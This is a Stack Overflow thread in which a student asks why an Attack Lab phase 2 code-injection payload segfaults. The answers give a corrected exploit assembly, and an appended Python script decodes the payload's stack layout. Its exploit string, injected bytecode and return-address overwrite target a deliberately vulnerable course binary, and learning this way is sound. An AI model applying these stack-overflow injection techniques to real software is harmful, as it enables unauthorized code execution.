Question
I have a buffer overflow lab I have to do for a project called The Attack Lab. I'm on phase 2 of the lab, and I have to inject code as part of my exploit string in order to make the program point to the address of the function touch2(). I've gotten to the point where the output says that it's a valid solution for phase 2, but then it says I caused a seg fault and then says I failed the phase.
This is the error message I receive:
cookie: 0x2d6fc2d5
Type string:Touch2!: You called touch2(0x2d6fc2d5)
valid solution for level 2 with target ctarget
ouch! You caused a segmentation fault!
better luck next time
FAILED
This is my exploit code in assembly:
movq $0x2d6fc2d5, %rdi
retq
This is what I pass into the program:
48 c7 c7 d5 c2 6f 2d c3 #bytecode of exploit code
00 00 00 00 00 00 00 00 #padding of 0x38, amount needed to overwrite ret address
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
68 bd 66 55 00 00 00 00 #address of rsp - 0x38
0d 18 40 00 00 00 00 00 #address of touch2()
I've looked at tutorials online and have been working on this for hours, but I haven't found a solution and I'm not sure what's causing the issue. It says the solution is valid, but then seg faults and fails. Any help would be greatly appreciated and let me know if there's anything that needs clarifying!
Answer 1:
It seems the attack lab has been tweaked recently. You should avoid overwriting the next part of the stack after the return address.
Instead, you can use the push instruction to add values to the stack. Try removing the touch2 address from the input and use the following code:
mov $0x2d6fc2d5, %rdi
pushq $0x40180d
ret
Answer 2:
Printing the "valid solution" line is equivalent to running your unauthorized code, so imo you've already beaten the challenge regardless of the seg fault.
I believe you have too much padding. The buffer is probably 24 chars and you've got 6 lines of buffer, so I'm guessing you are going past rsp, jumping to somewhere invalid, causing a segfault.
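To see how the string from the question is laid out in memory, here is an added example (not code from the question, the answers, or the lab itself) that parses the hex2raw-style text and reports the injected code, the zero padding, the return-address slot, and the word that lands past it, which is the overwrite answer 1 points at. The 0x38 offset and the `#` comment syntax are taken from the question; the decoder only knows the two x86-64 encodings that appear in this payload.

```python
# Parse an Attack Lab exploit string (hex2raw-style text) and report where
# each part lands relative to the overflowed buffer.  Assumes x86-64
# little-endian and a saved return address BUF_SIZE bytes past the buffer.

# Constructed copy of the question's exploit string; '#' comments are stripped.
EXPLOIT_TEXT = """
48 c7 c7 d5 c2 6f 2d c3 # injected code
00 00 00 00 00 00 00 00 # padding up to the return address
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
68 bd 66 55 00 00 00 00 # return-address slot -> buffer start
0d 18 40 00 00 00 00 00 # lands one word past the return address
"""
BUF_SIZE = 0x38  # offset of the saved return address (from the question)

def parse_hex2raw(text: str) -> bytes:
    """Whitespace-separated hex byte pairs to raw bytes; '#' starts a comment."""
    raw = bytearray()
    for line in text.splitlines():
        raw.extend(int(tok, 16) for tok in line.split("#", 1)[0].split())
    return bytes(raw)

def decode_injected(code: bytes) -> list:
    """Tiny decoder for the two x86-64 encodings used in this payload."""
    insns, i = [], 0
    while i < len(code):
        if code[i:i + 3] == b"\x48\xc7\xc7" and i + 7 <= len(code):  # movq $imm32, %rdi
            imm = int.from_bytes(code[i + 3:i + 7], "little", signed=True)
            insns.append(f"movq ${imm & (2**64 - 1):#x}, %rdi")
            i += 7
        elif code[i] == 0xC3:  # ret
            insns.append("ret")
            i += 1
        else:
            raise ValueError(f"unrecognised opcode {code[i]:#04x} at offset {i}")
    return insns

def stack_layout(payload: bytes, buf_size: int = BUF_SIZE) -> dict:
    """Split the payload into code, padding, the return-address slot, and spill-over words."""
    code_end = payload.index(0xC3) + 1  # the injected code ends at its ret
    word = lambda off: int.from_bytes(payload[off:off + 8], "little")
    return {
        "code_len": code_end,
        "padding_ok": all(b == 0 for b in payload[code_end:buf_size]),
        "ret_slot": word(buf_size),
        "words_past_ret": [word(o) for o in range(buf_size + 8, len(payload), 8)],
    }
```

For the question's string, the code takes 8 bytes, 48 zero bytes fill the rest of the 0x38-byte buffer, the slot at 0x38 receives the buffer address 0x5566bd68, and 0x40180d ends up one word beyond the return address.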
Source: https://stackoverflow.com/questions/53255874/buffer-overflow-attack-the-attack-lab-phase-2